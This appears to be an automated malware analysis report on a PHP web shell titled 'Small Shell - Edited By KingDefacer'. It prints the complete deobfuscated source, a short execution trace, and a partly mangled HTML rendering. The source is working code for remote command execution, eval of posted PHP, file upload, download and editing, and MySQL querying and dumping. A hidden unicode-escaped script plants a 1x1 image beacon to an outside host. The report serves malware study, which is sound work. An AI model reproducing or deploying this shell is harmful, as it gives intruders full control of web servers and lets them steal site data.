PHP Malware Analysis
small.php
md5: cf1f90e41ccc0527a58858f7a758b018
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, HTML, Original)
- getcwd (Deobfuscated, HTML, Original)
- php_uname (Deobfuscated, HTML, Original)
- phpinfo (Deobfuscated, Original)
- set_time_limit (Deobfuscated, HTML, Original)
Execution
- eval (Deobfuscated, HTML, Original)
Files
- copy (Deobfuscated, HTML, Original)
Input
- _FILES (Deobfuscated, HTML, Original)
- _POST (Deobfuscated, HTML, Original)
Title
- Small Shell - Edited By KingDefacer (Deobfuscated, HTML, Original)
URLs
- http://alturks.com/snf/s.php (HTML)
Deobfuscated PHP code
<?php
##########################################################
# Small Shell - Edited By KingDefacer #
# +POST method #
# +MySQL Client+Dumper for DB and tables #
# +PHP eval in text format and html for phpinfo() example #
# PREVED: sn0w, Zadoxlik, KingDefacer, Rebz, SkvoznoY #
# All bugs -> alturks.com #
# Just for fun :) #
##########################################################
error_reporting(E_ALL);
@set_time_limit(0);
function magic_q($s)
{
if (get_magic_quotes_gpc()) {
$s = str_replace('\\\'', '\'', $s);
$s = str_replace('\\\\', '\\', $s);
$s = str_replace('\\"', '"', $s);
$s = str_replace('\\\\0', '\\0', $s);
}
return $s;
}
function get_perms($fn)
{
$mode = fileperms($fn);
$perms = '';
$perms .= $mode & 0400 ? 'r' : '-';
$perms .= $mode & 0200 ? 'w' : '-';
$perms .= $mode & 0100 ? 'x' : '-';
$perms .= $mode & 040 ? 'r' : '-';
$perms .= $mode & 020 ? 'w' : '-';
$perms .= $mode & 010 ? 'x' : '-';
$perms .= $mode & 04 ? 'r' : '-';
$perms .= $mode & 02 ? 'w' : '-';
$perms .= $mode & 01 ? 'x' : '-';
return $perms;
}
$head = <<<headka
<html>
<head>
<title>Small Shell - Edited By KingDefacer</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
<style>
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
$page = isset($_POST['page']) ? $_POST['page'] : (isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '');
$page = $page == '' || $page != 'cmd' && $page != 'mysql' && $page != 'eval' ? 'cmd' : $page;
$winda = strpos(strtolower(php_uname()), 'wind');
define('format', 50);
$pages = '<center>###<a href=\'' . basename("/var/www/html/small.php.3484f57e8ea70dbab6dfab5f24255ce6.bin") . '\'>cmd</a>###<a href=\'' . basename("/var/www/html/small.php.3484f57e8ea70dbab6dfab5f24255ce6.bin") . '?mysql\'>mysql</a>###<a href=\'' . basename("/var/www/html/small.php.3484f57e8ea70dbab6dfab5f24255ce6.bin") . '?eval\'>eval</a>###</center>' . ($winda === false ? 'id :' . `id` : '');
switch ($page) {
case 'eval':
$eval_value = isset($_POST['eval_value']) ? $_POST['eval_value'] : '';
$eval_value = magic_q($eval_value);
$action = isset($_POST['action']) ? $_POST['action'] : 'eval';
if ($action == 'eval_in_html') {
@eval($eval_value);
} else {
echo $head . $pages;
?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?php
@eval($eval_value);
?></textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?php
}
break;
case 'cmd':
$cmd = !empty($_POST['cmd']) ? magic_q($_POST['cmd']) : '';
$work_dir = isset($_POST['work_dir']) ? $_POST['work_dir'] : getcwd();
$action = isset($_POST['action']) ? $_POST['action'] : 'cmd';
if (@is_dir($work_dir)) {
@chdir($work_dir);
$work_dir = getcwd();
if ($work_dir == '') {
$work_dir = '/';
} else {
if (!($work_dir[strlen($work_dir) - 1] == '/' || $work_dir[strlen($work_dir) - 1] == '\\')) {
$work_dir = "//";
}
}
} else {
if (file_exists($work_dir)) {
$work_dir = realpath($work_dir);
}
}
$work_dir = str_replace('\\', '/', $work_dir);
$e_work_dir = htmlspecialchars($work_dir, ENT_QUOTES);
switch ($action) {
case 'cmd':
echo $head . $pages;
?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?php
echo $e_work_dir;
?>' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?php
echo str_replace('\'', ''', $cmd);
?>'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120><br>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?php
if ($cmd !== '') {
echo '<strong>' . htmlspecialchars($cmd) . "</strong><hr>\n<textarea cols=120 rows=20>\n" . htmlspecialchars(`{$cmd}`) . "\n</textarea>";
} else {
$f_action = isset($_POST['f_action']) ? $_POST['f_action'] : 'view';
if (@is_dir($work_dir)) {
echo '<strong>Listing ' . $e_work_dir . '</strong><hr>';
$handle = @opendir($work_dir);
if ($handle) {
while (false !== ($fn = readdir($handle))) {
$files[] = $fn;
}
@closedir($handle);
sort($files);
$not_dirs = array();
for ($i = 0; $i < sizeof($files); $i++) {
$fn = $files[$i];
if (is_dir($fn)) {
echo '<a href=\'#\' onclick=\'document.list.work_dir.value="' . $e_work_dir . str_replace('"', '"', $fn) . '";document.list.submit();\'><b>' . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, 47) . '...' : $fn) . '</b></a>' . str_repeat(' ', format - strlen($fn));
if ($winda === false) {
$owner = @posix_getpwuid(@fileowner($work_dir . $fn));
$group = @posix_getgrgid(@filegroup($work_dir . $fn));
printf("% 20s|% -20s", $owner['name'], $group['name']);
}
echo @get_perms($work_dir . $fn) . str_repeat(' ', 10);
printf("% 20s ", @filesize($work_dir . $fn) . 'B');
printf("% -20s", @date('M d Y H:i:s', @filemtime($work_dir . $fn)) . "\n");
} else {
$not_dirs[] = $fn;
}
}
for ($i = 0; $i < sizeof($not_dirs); $i++) {
$fn = $not_dirs[$i];
echo '<a href=\'#\' onclick=\'document.list.work_dir.value="' . (is_link($work_dir . $fn) ? $e_work_dir . readlink($work_dir . $fn) : $e_work_dir . str_replace('"', '"', $fn)) . '";document.list.submit();\'>' . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, 47) . '...' : $fn) . '</a>' . str_repeat(' ', format - strlen($fn));
if ($winda === false) {
$owner = @posix_getpwuid(@fileowner($work_dir . $fn));
$group = @posix_getgrgid(@filegroup($work_dir . $fn));
printf("% 20s|% -20s", $owner['name'], $group['name']);
}
echo @get_perms($work_dir . $fn) . str_repeat(' ', 10);
printf("% 20s ", @filesize($work_dir . $fn) . 'B');
printf("% -20s", @date('M d Y H:i:s', @filemtime($work_dir . $fn)) . "\n");
}
echo "</pre><hr>";
?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?php
} else {
echo 'Error Listing ' . $e_work_dir;
}
} else {
switch ($f_action) {
case 'view':
echo '<strong>' . $e_work_dir . " Edit</strong><hr><pre>\n";
$f = @fopen($work_dir, 'r');
?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?php
if (!$f) {
echo $e_work_dir . ' not exists';
} else {
while (!feof($f)) {
echo htmlspecialchars(fread($f, 100000));
}
}
?></textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?php
echo $e_work_dir;
?>' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?php
break;
case 'save':
$file_text = isset($_POST['file_text']) ? magic_q($_POST['file_text']) : '';
$f = @fopen($work_dir, 'w');
if (!$f) {
echo '<strong>Error ' . $e_work_dir . "</strong><hr><pre>\n";
} else {
fwrite($f, $file_text);
fclose($f);
echo '<strong>' . $e_work_dir . " is saving</strong><hr><pre>\n";
}
break;
}
}
break;
}
break;
case 'upload':
if ($work_dir == '') {
$work_dir = '/';
} else {
if (!($work_dir[strlen($work_dir) - 1] == '/' || $work_dir[strlen($work_dir) - 1] == '\\')) {
$work_dir = "//";
}
}
$f = $_FILES["filename"]["name"];
if (!@copy($_FILES["filename"]["tmp_name"], $work_dir . $f)) {
echo "Upload is failed";
} else {
echo 'file is uploaded in ' . $e_work_dir;
}
break;
case 'download':
$fname = isset($_POST['fname']) ? $_POST['fname'] : '';
$temp_file = isset($_POST['temp_file']) ? 'on' : 'nn';
$f = @fopen($fname, 'r');
if (!$f) {
echo "file is not exists";
} else {
$archive = isset($_POST['archive']) ? $_POST['archive'] : '';
if ($archive == 'gzip') {
Header("Content-Type:application/x-gzip\n");
$s = gzencode(fread($f, filesize($fname)));
Header('Content-Length: ' . strlen($s) . "\n");
Header('Content-Disposition: attachment; filename="' . str_replace('/', '-', $fname) . ".gz\n\n");
echo $s;
} else {
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: ' . filesize($fname) . "\n");
Header('Content-Disposition: attachment; filename="' . str_replace('/', '-', $fname) . "\n\n");
ob_start();
while (feof($f) === false) {
echo fread($f, 10000);
ob_flush();
}
}
}
}
break;
case 'mysql':
$action = isset($_POST['action']) ? $_POST['action'] : 'query';
$user = isset($_POST['user']) ? $_POST['user'] : '';
$passwd = isset($_POST['passwd']) ? $_POST['passwd'] : '';
$db = isset($_POST['db']) ? $_POST['db'] : '';
$host = isset($_POST['host']) ? $_POST['host'] : 'localhost';
$query = isset($_POST['query']) ? magic_q($_POST['query']) : '';
switch ($action) {
case 'dump':
$mysql_link = @mysql_connect($host, $user, $passwd);
if (!$mysql_link) {
echo "Connect error";
} else {
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file = isset($_POST['to_file']) ? $_POST['to_file'] == '' ? false : $_POST['to_file'] : false;
$archive = isset($_POST['archive']) ? $_POST['archive'] : 'none';
if ($archive !== 'none') {
$to_file = false;
}
$db_dump = isset($_POST['db_dump']) ? $_POST['db_dump'] : '';
$table_dump = isset($_POST['table_dump']) ? $_POST['table_dump'] : '';
if (!@mysql_select_db($db_dump, $mysql_link)) {
echo "DB error";
} else {
$dump_file = "#ZaCo MySQL Dumper\n#db {$db} from {$host}\n";
ob_start();
if ($to_file) {
$t_f = @fopen($to_file, 'w');
if (!$t_f) {
die('Cant opening ' . $to_file);
}
} else {
$t_f = false;
}
if ($table_dump == '') {
if (!$to_file) {
header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
}
$result = mysql_query('show tables', $mysql_link);
for ($i = 0; $i < mysql_num_rows($result); $i++) {
$rows = mysql_fetch_array($result);
$result2 = @mysql_query('show columns from `' . $rows[0] . '`', $mysql_link);
if (!$result2) {
$dump_file .= '#error table ' . $rows[0];
} else {
$dump_file .= 'create table `' . $rows[0] . "`(\n";
for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) {
$rows2 = mysql_fetch_array($result2);
$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . ",\n";
}
$rows2 = mysql_fetch_array($result2);
$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . "\n";
$type[$j] = $rows2[1];
$dump_file .= ");\n";
mysql_free_result($result2);
$result2 = mysql_query('select * from `' . $rows[0] . '`', $mysql_link);
$columns = $j - 1;
for ($j = 0; $j < mysql_num_rows($result2); $j++) {
$rows2 = mysql_fetch_array($result2);
$dump_file .= 'insert into `' . $rows[0] . '` values (';
for ($k = 0; $k < $columns; $k++) {
$dump_file .= $rows2[$k] == '' ? 'null,' : '\'' . addslashes($rows2[$k]) . '\',';
}
$dump_file .= ($rows2[$k] == '' ? 'null);' : '\'' . addslashes($rows2[$k]) . '\');') . "\n";
if ($archive == 'none') {
if ($to_file) {
fwrite($t_f, $dump_file);
fflush($t_f);
} else {
echo $dump_file;
ob_flush();
}
$dump_file = '';
}
}
mysql_free_result($result2);
}
}
mysql_free_result($result);
if ($archive != 'none') {
$dump_file = gzencode($dump_file);
header('Content-Length: ' . strlen($dump_file) . "\n");
echo $dump_file;
} else {
if ($t_f) {
fclose($t_f);
echo 'Dump for ' . $db_dump . ' now in ' . $to_file;
}
}
} else {
$result2 = @mysql_query('show columns from `' . $table_dump . '`', $mysql_link);
if (!$result2) {
echo 'error table ' . $table_dump;
} else {
if (!$to_file) {
header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
}
if ($to_file === false) {
header('Content-Type: application/x-' . ($archive == 'none' ? 'octet-stream' : 'gzip') . "\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_{$table_dump}.sql" . ($archive == 'none' ? '' : '.gz') . "\"\n\n");
}
$dump_file .= "create table `{$table_dump}`(\n";
for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) {
$rows2 = mysql_fetch_array($result2);
$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . ",\n";
}
$rows2 = mysql_fetch_array($result2);
$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ($rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL') . "\n";
$type[$j] = $rows2[1];
$dump_file .= ");\n";
mysql_free_result($result2);
$result2 = mysql_query('select * from `' . $table_dump . '`', $mysql_link);
$columns = $j - 1;
for ($j = 0; $j < mysql_num_rows($result2); $j++) {
$rows2 = mysql_fetch_array($result2);
$dump_file .= 'insert into `' . $table_dump . '` values (';
for ($k = 0; $k < $columns; $k++) {
$dump_file .= $rows2[$k] == '' ? 'null,' : '\'' . addslashes($rows2[$k]) . '\',';
}
$dump_file .= ($rows2[$k] == '' ? 'null);' : '\'' . addslashes($rows2[$k]) . '\');') . "\n";
if ($archive == 'none') {
if ($to_file) {
fwrite($t_f, $dump_file);
fflush($t_f);
} else {
echo $dump_file;
ob_flush();
}
$dump_file = '';
}
}
mysql_free_result($result2);
if ($archive != 'none') {
$dump_file = gzencode($dump_file);
header('Content-Length: ' . strlen($dump_file) . "\n");
echo $dump_file;
} else {
if ($t_f) {
fclose($t_f);
echo 'Dump for ' . $db_dump . ' now in ' . $to_file;
}
}
}
}
}
}
break;
case 'query':
echo $head . $pages;
?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?php
echo $user;
?>'></td><td>Passwd :<input name='passwd' type=text value='<?php
echo $passwd;
?>'></td><td>Host :<input name='host' type=text value='<?php
echo $host;
?>'></td><td>DB :<input name='db' type=text value='<?php
echo $db;
?>'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?php
echo htmlspecialchars($query);
?></textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?php
echo $db;
?>'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?php
$mysql_link = @mysql_connect($host, $user, $passwd);
if (!$mysql_link) {
echo "Connect error";
} else {
if ($db != '') {
if (!@mysql_select_db($db, $mysql_link)) {
echo "DB error";
mysql_close($mysql_link);
break;
}
}
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$result = @mysql_query($query, $mysql_link);
if (!$result) {
echo mysql_error();
} else {
echo "<table valign=top align=left>\n<tr>";
for ($i = 0; $i < mysql_num_fields($result); $i++) {
echo '<td><b>' . htmlspecialchars(mysql_field_name($result, $i)) . '</b> </td>';
}
echo "\n</tr>\n";
for ($i = 0; $i < mysql_num_rows($result); $i++) {
$rows = mysql_fetch_array($result);
echo "<tr valign=top align=left>";
for ($j = 0; $j < mysql_num_fields($result); $j++) {
echo '<td>' . htmlspecialchars($rows[$j]) . '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
}
mysql_close($mysql_link);
}
break;
}
break;
}
?>
<h1>Edited By KingDefacer<h1>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>Execution traces
data/traces/cf1f90e41ccc0527a58858f7a758b018_trace-1676246602.4444.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:03:48.342258]
1 0 1 0.000238 393512
1 3 0 0.000347 414568 {main} 1 /var/www/html/uploads/small.php 0 0
2 4 0 0.000397 414568 str_replace 0 /var/www/html/uploads/small.php 121 3 '\'' ''' NULL
2 4 1 0.000416 414664
2 4 R ''
2 5 0 0.000675 414680 htmlspecialchars 0 /var/www/html/uploads/small.php 447 1 NULL
2 5 1 0.000693 414872
2 5 R ''
1 3 1 0.000712 414680
0.000742 314224
TRACE END [2023-02-12 22:03:48.342810]
Generated HTML code
<html><head></head><body link="palegreen" vlink="palegreen" text="palegreen" bgcolor="#2B2F34">alturks.com #
# Just for fun :) #
##########################################################
error_reporting(E_ALL);
@set_time_limit(0);
function magic_q($s)
{
if(get_magic_quotes_gpc())
{
$s=str_replace('\\\'','\'',$s);
$s=str_replace('\\\\','\\',$s);
$s=str_replace('\\"','"',$s);
$s=str_replace('\\\0','\0',$s);
}
return $s;
}
function get_perms($fn)
{
$mode=fileperms($fn);
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}
$head=<<<headka <html="">
<title>Small Shell - Edited By KingDefacer</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style>
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href="\''.basename(__FILE__).'\'">cmd</a>###<a href="\''.basename(__FILE__).'?mysql\'">mysql</a>###<a href="\''.basename(__FILE__).'?eval\'">eval</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
else
{
echo($head.$pages);
?>
<hr>
<form method="post">
<textarea cols="120" rows="20" name="eval_value"><?@eval($eval_value);?></textarea>
<input name="action" value="eval" type="submit">
<input name="action" value="eval_in_html" type="submit">
<input name="page" value="eval" type="hidden">
</form>
<hr>
<!--?
}
break;
}
case 'cmd':
{
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
$action=isset($_POST['action'])?$_POST['action']:'cmd';
if(@is_dir($work_dir))
{
@chdir($work_dir);
$work_dir=getcwd();
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
}
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
$work_dir=str_replace('\\','/',$work_dir);
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
switch($action)
{
case 'cmd' :
{
echo($head.$pages);
?-->
<form method="post" name="main_form">
<input name="work_dir" value="" type="text" size="120">
<input name="page" value="cmd" type="hidden">
<input type="submit" value="go">
</form>
<form method="post">
<input name="cmd" type="text" size="120" value="">
<input name="work_dir" type="hidden">
<input name="page" value="cmd" type="hidden">
<input name="action" value="cmd" type="submit" onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method="post" enctype="multipart/form-data">
<input type="file" name="filename">
<input name="work_dir" type="hidden">
<input name="page" value="cmd" type="hidden">
<input name="action" value="upload" type="submit" onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method="post">
<input name="fname" type="text" size="120"><br>
<input name="archive" type="radio" value="none">without arch
<input name="archive" type="radio" value="gzip" checked="true">gzip archive
<input name="work_dir" type="hidden">
<input name="page" value="cmd" type="hidden">
<input name="action" value="download" type="submit" onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre><!--?
if($cmd!==''){ echo('<strong-->'.htmlspecialchars($cmd)."<hr>\n<textarea cols="120" rows="20">\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
else
{
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir))
{
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
$handle=@opendir($work_dir);
if($handle)
{
while(false!==($fn=readdir($handle))){$files[]=$fn;};
@closedir($handle);
sort($files);
$not_dirs=array();
for($i=0;$i<sizeof($files);$i++) {="" $fn="$files[$i];" if(is_dir($fn))="" echo('<a="" href="\'#\'" onclick="\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'"><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i<sizeof($not_dirs);$i++) {="" $fn="$not_dirs[$i];" echo('<a="" href="\'#\'" onclick="\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','"',$fn)).'";document.list.submit();\'">'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('</sizeof($not_dirs);$i++)></sizeof($files);$i++)></pre><hr>');
?>
<form name="list" method="post">
<input name="work_dir" type="hidden" size="120"><br>
<input name="page" value="cmd" type="hidden">
<input name="f_action" value="view" type="hidden">
</form>
<!--?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
{
case 'view':
{
echo('<strong-->'.$e_work_dir." Edit<hr><pre>\n");
$f=@fopen($work_dir,'r');
?>
<form method="post">
<textarea name="file_text" cols="120" rows="20"><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
<input name="page" value="cmd" type="hidden">
<input name="work_dir" type="hidden" value="" size="120">
<input name="f_action" value="save" type="submit">
</form>
<!--?
break;
}
case 'save' :
{
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
$f=@fopen($work_dir,'w');
if(!($f))echo('<strong-->Error '.$e_work_dir."<hr><pre>\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
